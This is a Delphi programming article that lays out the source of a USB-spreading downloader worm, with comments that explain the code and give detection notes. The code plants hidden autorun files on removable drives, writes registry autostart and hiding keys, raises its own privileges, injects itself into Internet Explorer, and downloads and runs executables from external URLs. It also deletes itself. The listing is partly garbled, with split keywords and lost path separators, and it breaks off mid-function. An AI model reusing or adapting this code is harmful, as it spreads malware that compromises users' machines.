
[Delphi文章] 一个含U盘感染的下载者代码 







program AutoDown;
{$R  'ICON32.RES'  'ICON32.TXT' }
{$IMAGEBASE $17140000}
uses
  Windows, SysUtils, wininet, mmsystem, messages;

var
  htimer: integer;
  msg: tmsg;
  dw: bool;
  url1: pchar =
  ('http://www.xxx.com/xx.exe');
  url2: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url3: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url4: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url5: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url6: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url7: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url8: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url9: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url10: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url11: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url12: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url13: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url14: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
  url15: pchar =
  ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');

  Downfile: function(Caller: pointer; URL: PChar; FileName: PChar; Reserved:
    LongWo rd; StatusCB: pointer): Longint; stdcall;
  hShell, hUrlmon: THandle;

  ShellRun: function(hWnd: HWND; Operation, FileName, Parameters, Directo ry:
    PChar; ShowCmd: Integer): Cardinal; stdcall;

procedure RunInject(InjType: integer); stdcall; fo rward;
const
  ExeName = 'system.exe';
  faReadOnly = $00000001;
  faHidden = $00000002;
  faSysFile = $00000004;
  faVolumeID = $00000008;
  faDirecto ry = $00000010;
  faArchive = $00000020;
  faAnyFile = $0000003F;
  Lyint: array[0..9] of Char = ('0', '1', '2', '3', '4', '5', '6', '7', '8',
    '9');
  Lychr: array[0..25] of Char = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',
    'j',
    'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
    'u', 'v', 'w', 'x', 'y', 'z');

var
  i, Len, infsize: integer;
  exefile, OpenPath, DriverList, TempFile: string;
  NoDel: integer;
  sa1, sa2, MyCurso r: THandle;

type
  TFileName = type string;
  TSearchRec = reco rd
    Time: Integer;
    Size: Integer;
    Attr: Integer;
    Name: TFileName;
    ExcludeAttr: Integer;
    FindHandle: THandle platfo rm;
    FindData: TWin32FindData platfo rm;
  end;

  LongRec = packed reco rd
    case Integer of
      0: (Lo, Hi: Wo rd);
      1: (Wo rds: array[0..1] of Wo rd);
      2: (Bytes: array[0..3] of Byte);
  end;

  {$R *.RES}

// Existence probe built on FindFirstFileA: true when any directory entry matches
// FileName (directories match as well, not only files). SendMetoDriver and
// IsFileInUse use it to decide whether a dropped file is already present.
// Shadows SysUtils.FileExists for this program.
function FileExists(const FileName: string): Boolean;
var
  Handle: THandle;
  FindData: TWin32FindData;
begin
  Handle := FindFirstFileA(PChar(FileName), FindData);
  result := Handle <> INVALID_HANDLE_VALUE;
  if result then
  begin
    // The search handle is released with CloseHandle here; FindClose is the
    // documented counterpart of FindFirstFile.
    CloseHandle(Handle);
  end;
end;

// Re-implementation of SysUtils.FindMatchingFile: advances past entries whose
// attributes intersect F.ExcludeAttr, then fills Time/Size/Attr/Name from the
// current FindData. Returns 0 on success, or GetLastError when FindNextFile runs
// out of entries. Only reachable through FindFirst below.
function FindMatchingFile(var F: TSearchRec): Integer;
var
  LocalFileTime: TFileTime;
begin
  with F do
  begin
    while FindData.dwFileAttributes and ExcludeAttr <> 0 do
      if not FindNextFile(FindHandle, FindData) then
      begin
        Result := GetLastErro r;
        Exit;
      end;
    // Last-write time is converted to local time and packed into the DOS
    // date/time format expected by the Time field (Hi = date, Lo = time).
    FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
    FileTimeToDosDateTime(LocalFileTime, LongRec(Time).Hi,
      LongRec(Time).Lo);
    Size := FindData.nFileSizeLow;
    Attr := FindData.dwFileAttributes;
    Name := FindData.cFileName;
  end;
  Result := 0;
end;

// Releases the Win32 search handle held in F (if any) and marks it invalid so a
// repeated call is a no-op. Shadows SysUtils.FindClose; the Windows.FindClose
// qualifier avoids recursing into this procedure.
procedure FindClose(var F: TSearchRec);
begin
  if F.FindHandle <> INVALID_HANDLE_VALUE then
  begin
    Windows.FindClose(F.FindHandle);
    F.FindHandle := INVALID_HANDLE_VALUE;
  end;
end;

// Re-implementation of SysUtils.FindFirst. faSpecial lists the attribute bits that
// are excluded unless the caller asked for them in Attr. Returns 0 on success; on
// any failure the search handle is closed and GetLastError is returned.
// Declared but not called anywhere in this listing.
function FindFirst(const Path: string; Attr: Integer;
  var
  F: TSearchRec): Integer;
const
  faSpecial = faHidden o r faSysFile o r faVolumeID o r faDirecto ry;
begin
  F.ExcludeAttr := not Attr and faSpecial;
  F.FindHandle := FindFirstFile(PChar(Path), F.FindData);
  if F.FindHandle <> INVALID_HANDLE_VALUE then
  begin
    Result := FindMatchingFile(F);
    if Result <> 0 then FindClose(F);
  end
  else
    Result := GetLastErro r;
end;

// SetFileAttributes wrapper returning 0 on success or GetLastError on failure.
// Not called in this listing; the rest of the program calls SetFileAttributes
// directly and ignores its result.
function FileSetAttr(const FileName: string; Attr: Integer): Integer;
begin
  Result := 0;
  if not SetFileAttributes(PChar(FileName), Attr) then
    Result := GetLastErro r;
end;

// Despite its name this deletes nothing: it returns the file's attribute bits.
// Pascal identifiers are case-insensitive, so the DeleteFile(pchar(exefile)) call
// in setme appears to resolve to this function rather than Windows.DeleteFile;
// the previous %TEMP% copy is then only replaced by the CopyFile that follows it.
function deletefile(const FileName: string): Integer;
begin
  Result := GetFileAttributes(PChar(FileName));
end;

 

// Returns a well-known system folder: 0 = Windows directory, 1 = System directory,
// 2 = Temp path. Any other dInt leaves s uninitialised. The non-Temp branch appends
// a literal that is empty as rendered on this page; a path separator was most
// likely lost in extraction, so treat the trailing-separator behaviour as unconfirmed.
function GetDirecto ry(dInt: integer): string;
var
  s: array[0..255] of Char;
begin
  case dInt of
    0: GetWindowsDirecto ry(@s, 256); // path of the Windows installation folder
    1: GetSystemDirecto ry(@s, 256); // path of the system folder
    2: GetTempPath(256, @s); // path of the Temp folder
  end;
  if dInt = 2 then
    result := string(s)
  else
    result := string(s) + '';
end;

// Returns the leading part of FileName up to and including its last separator, by
// moving characters one at a time while a separator is still present. As rendered
// the first Pos() searches for an empty string (Pos reports 0 for that), so only
// '/' is effective; the backslash case was most likely lost in page extraction.
// Shadows SysUtils.ExtractFilePath.
function ExtractFilePath(FileName: string): string;
begin
  Result := '';
  while ((Pos('', FileName) <> 0) o r (Pos('/', FileName) <> 0)) do
  begin
    Result := Result + Copy(FileName, 1, 1);
    Delete(FileName, 1, 1);
  end;
end;

// Strips everything up to and including the last separator. The first loop looks
// for an empty string as rendered here (Pos returns 0, so it never runs); only the
// '/' loop is effective — the backslash was most likely lost in page extraction.
// setme uses this to test whether the process was started as ExeName.
function ExtractFileName(FileName: string): string;
begin
  while Pos('', FileName) <> 0 do
    Delete(FileName, 1, Pos('', FileName));
  while Pos('/', FileName) <> 0 do
    Delete(FileName, 1, Pos('/', FileName));
  Result := FileName;
end;

// Creates (or opens) subkey under key and stores value as REG_EXPAND_SZ data of
// length(value) bytes, i.e. without a terminating NUL. Returns true only when
// RegSetValueEx reports success; the RegCreateKey result is not checked.
// The only caller (regme) writes HKLM autostart and Explorer-policy keys — that
// registry activity is what a detection rule should key on.
function SetRegValue(key: Hkey; subkey, name, value: string): boolean;
var
  regkey: hkey;
begin
  result := false;
  RegCreateKey(key, PChar(subkey), regkey);
  if RegSetValueEx(regkey, Pchar(name), 0, REG_EXPAND_SZ, pchar(value),
    length(value)) = 0 then
    result := true;
  RegCloseKey(regkey);
end;

// Case-insensitive (ASCII a..z only) ordinal compare in BASM, mirroring
// SysUtils.CompareText: 0 when the strings are equal ignoring case, otherwise the
// difference of the first mismatching upper-cased bytes, or the length difference
// when one string is a prefix of the other. main and setme use it to compare
// ParamStr(0) against the install path.
function CompareText(const S1, S2: string): Integer; assembler;
asm
        PUSH    ESI
        PUSH    EDI
        PUSH    EBX
        { ESI/EDI = S1/S2 data pointers }
        MOV    ESI,EAX
        MOV    EDI,EDX
        { EAX/EDX = Length(S1)/Length(S2); the length dword precedes AnsiString data, nil = 0 }
        o r      EAX,EAX
        JE      @@0
        MOV    EAX,[EAX-4]
@@0:    o r      EDX,EDX
        JE      @@1
        MOV    EDX,[EDX-4]
        { ECX = min(len1, len2) }
@@1:    MOV    ECX,EAX
        CMP    ECX,EDX
        JBE    @@2
        MOV    ECX,EDX
        { CMP ECX,ECX sets ZF so an empty common prefix jumps straight to the length difference }
@@2:    CMP    ECX,ECX
@@3:    REPE    CMPSB
        JE      @@6
        { mismatch: fold both bytes a..z to upper case and retry }
        MOV    BL,BYTE PTR [ESI-1]
        CMP    BL,'a'
        JB      @@4
        CMP    BL,'z'
        JA      @@4
        SUB    BL,20H
@@4:    MOV    BH,BYTE PTR [EDI-1]
        CMP    BH,'a'
        JB      @@5
        CMP    BH,'z'
        JA      @@5
        SUB    BH,20H
@@5:    CMP    BL,BH
        JE      @@3
        MOVZX  EAX,BL
        MOVZX  EDX,BH
        { result = byte difference, or length difference when the prefix matched }
@@6:    SUB    EAX,EDX
        POP    EBX
        POP    EDI
        POP    ESI
end;

// Self-deletion. Writes a batch file '~Lying.bAt' into the Temp folder that loops
// "del <own exe>" until the executable is gone and then deletes itself, marks the
// batch hidden+system and launches it hidden at idle priority. Nothing is checked:
// a failed write or CreateProcess simply leaves the original in place.
// Forensics note: the batch name, the :tRy/goto loop and the Temp location are the
// recoverable indicators when the process is stopped before the loop completes.
procedure DelMe;
var
  BatchFile: TextFile;
  BatchFileName: string;
  ProcessInfo: TProcessInfo rmation;
  StartUpInfo: TStartupInfo;
begin
  BatchFileName := ExtractFilePath(GetDirecto ry(2)) + '~Lying.bAt';
  AssignFile(BatchFile, BatchFileName);
  Rewrite(BatchFile);
  Writeln(BatchFile, ':tRy');
  Writeln(BatchFile, 'DeL "' + ParamStr(0) + '" /a');
  Writeln(BatchFile, 'iF eXiSt "' + ParamStr(0) + '"' + ' gOtO tRy');
  Writeln(BatchFile, 'dEl %0 /A');
  CloseFile(BatchFile);
  SetFileAttributes(pchar(BatchFileName), FILE_ATTRIBUTE_HIDDEN +
    FILE_ATTRIBUTE_SYSTEM);
  FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
  StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
  StartUpInfo.wShowWindow := SW_HIDE;
  if CreateProcess(nil, PChar(BatchFileName), nil, nil,
    False, IDLE_PRIo rITY_CLASS, nil, nil, StartUpInfo,
    ProcessInfo) then
  begin
    // handles are closed immediately; the batch keeps running on its own
    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
  end;
end;

// Returns the letters of the removable drives currently present. The loop runs
// i = 1..25 and uses Chr(i + 65), so it probes 'B'..'Z' and never checks 'A'. The
// fixed/remote checks are commented out, so only DRIVE_REMOVABLE is collected —
// this is the worm's spreading surface. Result is not explicitly initialised
// before the loop.
function GetDrives: string;
var
  DiskType: Wo rd;
  D: Char;
  Str: string;
  i: Integer;
begin
  fo r i := 1 to 25 do // meant to walk the 26 drive letters (this range covers 25)
  begin
    D := Chr(i + 65);
    Str := D + ':';
    DiskType := GetDriveType(PChar(Str)); // classifies fixed, network and removable disks...
    if {(DiskType = DRIVE_FIXED) o r (DiskType = DRIVE_REMOTE) o r} (DiskType =
      DRIVE_REMOVABLE) then
      Result := Result + D;
  end;
end;

// Drops the worm on one drive root: writes a hidden+system 'Auto run.inf' whose
// open / shellexecute / shellAutocommand entries all point at ExeName, then copies
// the running executable to DriveName + ExeName with the same attributes. Each file
// is written only when it does not already exist. The Boolean result is never
// assigned. ('Auto run.inf' carries an inserted space like the 'o r' tokens; see the
// author's note at the end of the page.)
// Defender notes: a hidden autorun.inf plus a hidden system.exe in a drive root is
// the on-disk indicator. Current Windows versions no longer honour autorun.inf on
// removable media by default; on older systems the NoDriveTypeAutoRun policy
// disables it.
function SendMetoDriver(const DriveName: string): Boolean;
var
  InfFile, Mmfile: string;
  InfText: TextFile;
begin
  InfFile := DriveName + 'Auto run.inf';
  MmFile := DriveName + ExeName;
  if (not FileExists(InfFile))  then
  begin
    AssignFile(InfText, InfFile);
    try
      ReWrite(InfText);
      WriteLn(InfText, '[Auto run]');
      WriteLn(InfText, 'open=' + ExeName);
      WriteLn(InfText, 'shellexecute=' + ExeName);
      WriteLn(InfText, 'shellAutocommand=' + ExeName);
    finally
      CloseFile(InfText);
    end;
    SetFileAttributes(pchar(inffile), FILE_ATTRIBUTE_HIDDEN +
      FILE_ATTRIBUTE_SYSTEM);
  end;
  if (not FileExists(MmFile))  then
  begin
    // bFailIfExists = false: an existing (but FileExists-missed) file is overwritten
    CopyFile(pchar(ParamStr(0)), pchar(MmFile), false);
    SetFileAttributes(pchar(MmFile), FILE_ATTRIBUTE_HIDDEN +
      FILE_ATTRIBUTE_SYSTEM);
  end;
end;

// Tries to open fName for read/write with no sharing; INVALID_HANDLE_VALUE is
// taken to mean "in use". Any other open failure (permissions, bad path) is also
// reported as in use, and a missing file is reported as not in use. setme uses it
// to decide whether the %TEMP% copy can be replaced.
function IsFileInUse(fName: string): boolean;
var
  HFileRes: HFILE;
begin
  Result := false;
  if not FileExists(fName) then
    exit;
  HFileRes := CreateFile(pchar(fName), GENERIC_READ o r GENERIC_WRITE,
    0 {this is the trick!}, nil, OPEN_EXISTING, FILE_ATTRIBUTE_No rMAL, 0);
  Result := (HFileRes = INVALID_HANDLE_VALUE);
  if not Result then
    CloseHandle(HFileRes);
end;
// Creates the drop folder that Download writes into. The path is rendered here as
// 'C:Program FilesWindowsUpdate'; its separators were most likely lost when the
// page was extracted. The try/except is inert: CreateDir reports failure through
// its Boolean result, not by raising.
procedure dir;
begin
if not directo ryexists(pchar('C:Program FilesWindowsUpdate')) then
  try
    createdir(pchar('C:Program FilesWindowsUpdate'));
  except
  end;
        end;
// Persistence and concealment through two HKLM writes (see SetRegValue):
//  * policies\Explorer\Run value 'Lying' = exefile — policy-based autostart of the
//    %TEMP% copy at logon;
//  * Advanced\Folder\Hidden\SHOWALL CheckedValue = 2 — makes Explorer's "show hidden
//    files" choice fail to stick, so the hidden autorun files stay out of sight.
// Both keys are classic autostart / anti-forensic indicators worth a registry
// monitoring rule; the value name 'Lying' is the sample-specific IoC.
// (Key paths are rendered without separators on this page.)
procedure regme;
begin
  SetRegValue(HKEY_LOCAL_MACHINE,
    'SoftWareMicrosoftWindowsCurrentVersionpoliciesExplo rerRun', 'Lying', exefile); // autostart
  SetRegValue(HKEY_LOCAL_MACHINE,
    'SOFTWAREMicrosoftWindowsCurrentVersionExplo rerAdvancedFolderHiddenSHOWALL',
    'CheckedValue', '2'); // force hidden/system files to stay hidden
end;

// One spreading pass: drops the worm on every removable drive found by GetDrives.
// The locals i / len / driverlist shadow the globals of the same names (identifiers
// are case-insensitive). Drives are visited last-to-first; as rendered the argument
// is '<letter>:' with no trailing separator (likely lost in extraction).
// Called from TimerProc on every timer tick.
procedure infect();
var
  i, len: integer;
  driverlist: string;
begin
  DriverList := GetDrives;
  Len := Length(DriverList);
  fo r i := Len downto 1 do
    SendMetoDriver(DriverList[i] + ':');
end;

// Wraps InternetGetConnectedState. ConTypes is an output flags parameter, so the
// MODEM/LAN/PROXY sum assigned beforehand is overwritten rather than used as a
// filter. TimerProc polls this until it returns True and then triggers the payload.
function GetOnlineStatus: Boolean;
var
  ConTypes: Integer;
begin
  ConTypes := INTERNET_CONNECTION_MODEM + INTERNET_CONNECTION_LAN +
    INTERNET_CONNECTION_PROXY;
  if (InternetGetConnectedState(@ConTypes, 0) = False) then
    Result := False
  else
    Result := True;
end;
// Enables SeDebugPrivilege on the current process token, which is what later lets
// OpenProcess(PROCESS_ALL_ACCESS) succeed against other processes. tkp is not
// zeroed and none of the Lookup/Adjust results are checked.
// Detection note: an executable running from %TEMP% adjusting its own token to gain
// SeDebugPrivilege is a strong behavioural signal.
procedure GetDebugPrivs; // raise the process's own privileges
var
  hToken: THandle;
  tkp: TTokenPrivileges;
  retval: dwo rd;
begin
  if (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES o r
    TOKEN_QUERY, hToken)) then
  begin
    LookupPrivilegeValue(nil, 'SeDebugPrivilege', tkp.Privileges[0].Luid);
    tkp.PrivilegeCount := 1;
    tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
  end;
end;
// Multimedia-timer callback (armed with TIME_PERIODIC in infecttimer). Every tick
// runs one infect pass; on the first tick where GetOnlineStatus is True it enables
// SeDebugPrivilege and calls RunInject(1), then sets dw so the payload runs once.
// Both try/except blocks swallow every error silently. The timer is never killed
// (timeKillEvent is commented out), so the drive scan repeats for the process lifetime.
procedure TimerProc(uID, uMsg, dwUser, dw1, dw2: DWo rD); stdcall;
// once a network connection is up, run the remaining functions and the download
begin
try
  infect;
  except
  end;
  if GetOnlineStatus and not dw then
  begin
    try
    GetDebugPrivs;
      RunInject(1); // 1 = inject into iexplore.exe
    except
    end;
    dw := true;
  end;

  //timeKillEvent(hTimer3);
end;

// Thread body started by AutoAndw0rM. Arms a 6000 ms periodic multimedia timer that
// calls TimerProc, then sits in a GetMessage loop so the thread stays alive.
// The commented MessageBox is a leftover from another build: time1 / hostbc / urlbc
// are not declared anywhere in this listing.
procedure infecttimer; stdcall;
begin
  //Messagebox(0,pchar(time1+' '+hostbc+' '+urlbc),'data', MB_OK);
  hTimer := TimeSetEvent(6000, 0, TimerProc, 0, TIME_PERIODIC);
  while (GetMessage(Msg, 0, 0, 0)) do
    ;
end;

// Main loop of the installed copy (reached from main when ParamStr(0) equals exefile).
// Exits immediately if its own path contains 'pagefile.pif' (reason not stated in the
// listing); enforces a single instance through the named mutex 'dx' (the handle is
// never closed); creates the drop folder; writes the registry entries; starts the
// infecttimer thread; then blocks in a GetMessage loop for the life of the process.
// Detection note: the mutex name 'dx' is the sample-specific runtime IoC.
procedure AutoAndw0rM;
var
  tid: dwo rd;
begin
  dw := false;
  if pos('pagefile.pif', pchar(paramstr(0))) > 0 then exitprocess(0);
  CreateMutex(nil, TRUE, 'dx'); // TRUE: this process takes initial ownership of the mutex
  if (GetLastErro r = ERRo r_ALREADY_EXISTS) then exit; // mutex already existed: another instance is running
  dir;
  regme;  // write registry entries
  CreateThread(nil, 0, @infecttimer, nil, 0, TID);
  while (GetMessage(Msg, 0, 0, 0)) do
    ;
end;

// Payload stage. It is the EntryPoint handed to Inject by RunInject, so it executes
// inside the copied image in iexplore.exe — presumably so the HTTP traffic originates
// from the browser process. ShellExecuteA and URLDownloadToFileA are resolved by name
// at runtime (they will not show in the static import table; the strings will). For
// each of the 15 url slots it downloads to '<n>.exe' under the 'C:Program
// FilesWindowsUpdate' folder (separators lost in rendering) and opens it with
// ShowCmd 5. Every stage is wrapped in a swallow-all try/except, so nil function
// pointers or failed downloads fail silently; the kernel32/user32 LoadLibrary
// results are discarded. url2..url15 are redacted on the page.
// Detection note: iexplore.exe writing executables into Program Files\WindowsUpdate
// and launching them, with no user-visible browsing, is the behavioural indicator.
procedure Download; // download stage

begin
// dw := true; // downloaded once
  LoadLibrary('kernel32.dll');
  LoadLibrary('user32.dll');
  hShell := LoadLibrary('Shell32.dll');
  hUrlmon := LoadLibrary('urlmon.dll');
  @ShellRun := GetProcAddress(hShell, 'ShellExecuteA');
  @Downfile := GetProcAddress(hUrlmon, 'URLDownloadToFileA');

  // duplicate of procedure dir, left commented
  {if not directo ryexists(pchar('C:Program FilesWindowsUpdate')) then
  try
    createdir(pchar('C:Program FilesWindowsUpdate'));
  except
  end;  }
  try
  Downfile(nil,pchar(url1),'C:Program FilesWindowsUpdate1.exe', 0, nil);
  ShellRun(0,'open','C:Program FilesWindowsUpdate1.exe',nil,nil,5);
  except
  end;

  // leftover test download, left commented
  {Downfile(nil, pchar('http://www.mybr.o rg/test/a.exe'),
    'C:Program FilesWindowsUpdate1.exe', 0, nil);
  ShellRun(0, 'open', 'C:Program FilesWindowsUpdate1.exe', nil, nil, 5);
  }
  try
    Downfile(nil, pchar(url2), 'C:Program FilesWindowsUpdate2.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate2.exe', nil, nil, 5);
  except
  end;

  try
    Downfile(nil, pchar(url3), 'C:Program FilesWindowsUpdate3.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate3.exe', nil, nil, 5);
  except
  end;

  try
    Downfile(nil, pchar(url4), 'C:Program FilesWindowsUpdate4.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate4.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url5), 'C:Program FilesWindowsUpdate5.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate5.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url6), 'C:Program FilesWindowsUpdate6.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate6.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url7), 'C:Program FilesWindowsUpdate7.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate7.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url8), 'C:Program FilesWindowsUpdate8.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate8.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url9), 'C:Program FilesWindowsUpdate9.exe', 0, nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate9.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url10), 'C:Program FilesWindowsUpdate10.exe', 0,
      nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate10.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url11), 'C:Program FilesWindowsUpdate11.exe', 0,
      nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate11.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url12), 'C:Program FilesWindowsUpdate12.exe', 0,
      nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate12.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url13), 'C:Program FilesWindowsUpdate13.exe', 0,
      nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate13.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url14), 'C:Program FilesWindowsUpdate14.exe', 0,
      nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate14.exe', nil, nil, 5);
  except
  end;
  try
    Downfile(nil, pchar(url15), 'C:Program FilesWindowsUpdate15.exe', 0,
      nil);
    ShellRun(0, 'open', 'C:Program FilesWindowsUpdate15.exe', nil, nil, 5);
  except
  end;
  //ExitProcess(0);
end;

// Whole-image injection. Reads this process's own image base and SizeOfImage from
// the PE headers, releases whatever the target holds at that base, allocates RWX
// memory there, copies the entire image across and starts EntryPoint (here
// @Download) as a remote thread with Module as its parameter. Allocating at the
// identical base is what lets the copied code run without relocation — presumably
// the reason for the fixed {$IMAGEBASE} directive at the top of the file. No return
// value is checked.
// Detection note: VirtualFreeEx(MEM_RELEASE) followed by VirtualAllocEx with
// PAGE_EXECUTE_READWRITE, WriteProcessMemory and CreateRemoteThread against a
// freshly spawned iexplore.exe is standard EDR telemetry; in memory forensics the
// indicator is a private RWX region in iexplore.exe containing a full PE image.
procedure Inject(ProcessHandle: longwo rd; EntryPoint: pointer); // injection
var
  Module, NewModule: Pointer;
  Size, BytesWritten, TID: longwo rd;
begin
  // base address of this process's own image
  Module := Pointer(GetModuleHandle(nil));
  // SizeOfImage from the optional header (DOS header -> e_lfanew -> signature + file header)
  Size := PImageOptionalHeader(Pointer(integer(Module) +
    PImageDosHeader(Module)._lfanew +
    SizeOf(dwo rd) + SizeOf(TImageFileHeader))).SizeOfImage;
  // release the target's mapping at our image base (original comment spoke of allocating here)
  VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
  // reserve + commit RWX memory at the same base in the target
  NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT o r
    MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  // copy this image into the target
  WriteProcessMemo ry(ProcessHandle, NewModule, Module, Size, BytesWritten);
  // start EntryPoint in the target; injection complete
  createRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;

// Installer path, taken by main when the running file is not yet the %TEMP% copy.
// If the process was started from a drive root as ExeName (the autorun case) and an
// Explorer window is in the foreground, it writes the drive root into Explorer's
// address bar (ComboBoxEx32 -> ComboBox -> Edit) and clicks the toolbar, so the
// user sees the drive open as expected; NoDel := 1 then keeps the dropper on the
// drive. In all cases it then replaces the %TEMP% copy when that file is not locked
// (the DeleteFile call resolves to the local attribute-reading deletefile, so the
// CopyFile does the overwrite), hides it, starts it with WinExec(SW_HIDE), removes
// itself via DelMe unless NoDel = 1, and exits.
// Detection note: a hidden system.exe appearing in %TEMP% shortly after a removable
// drive is opened is the host-side indicator.
procedure setme;
begin
  if (CompareText(ParamStr(0), Copy(ParamStr(0), 1, 3) + ExeName) = 0) and
    (CompareText(ExtractFileName(ParamStr(0)), exename) = 0) then
  begin
    sa1 := Findwindow('CabinetWClass', nil); // "My Computer" / Explorer window
    if GetFo regroundwindow <> sa1 then exit;
    sa1 := findwindowex(sa1, 0, 'Wo rkerW', nil);
    sa1 := findwindowex(sa1, 0, 'ReBarWindow32', nil);
    sa1 := findwindowex(sa1, 0, 'ComboBoxEx32', nil);
    sa2 := findwindowex(sa1, 0, 'ToolbarWindow32', nil);
    sa1 := findwindowex(sa1, 0, 'ComboBox', nil);
    sa1 := findwindowex(sa1, 0, 'Edit', nil);
    OpenPath := Copy(ParamStr(0), 1, 3);
    SendMessage(sa1, WM_SETTEXT, length(OpenPath), longint(pchar(OpenPath)));
    SendMessage(sa2, WM_LBUTTONDOWN, 0, 0);
    SendMessage(sa2, WM_LBUTTONUP, 0, 0);
    SendMessage(sa1, WM_KILLFOCUS, 0, 0); // drop focus to avoid arousing suspicion...
    NoDel := 1;
  end;
  if IsFileInUse(exefile) = false then
  begin
    SetFileAttributes(pchar(exefile), 0);
    DeleteFile(pchar(exefile));
    Copyfile(pchar(ParamStr(0)), pchar(exefile), false);
    SetFileAttributes(pchar(exefile), FILE_ATTRIBUTE_HIDDEN +
      FILE_ATTRIBUTE_SYSTEM);
    winexec(pchar(exefile), sw_hide);
  end;
  //AutoAndw0rM;
  if (NoDel <> 1) then DelMe; // self-delete unless NoDel = 1
  ExitProcess(0);
end;

// Chooses the injection target. InjType = 0 only resolves explorer's PID from the
// Shell_TrayWnd owner and then does nothing with it (OpenProcess/Inject live in the
// else branch). Any other value starts a hidden iexplore.exe from the fixed Program
// Files path, waits 500 ms, takes the PID of the IEFrame window, opens it with
// PROCESS_ALL_ACCESS and injects Download. Nothing is verified: if the window is not
// up yet, PID holds whatever GetWindowThreadProcessId left and OpenProcess fails
// silently. Called from TimerProc as RunInject(1).
// Detection note: a hidden iexplore.exe spawned by an executable in %TEMP%,
// immediately followed by OpenProcess with full access and remote-thread creation.
procedure RunInject(InjType: integer);
var
  ProcessHandle, PID: longwo rd;

begin
  if InjType = 0 then // inject into explorer.exe
  begin
    // get explorer's PID from the owner of the Shell_TrayWnd window (class name found with Spy++)
    GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
  end
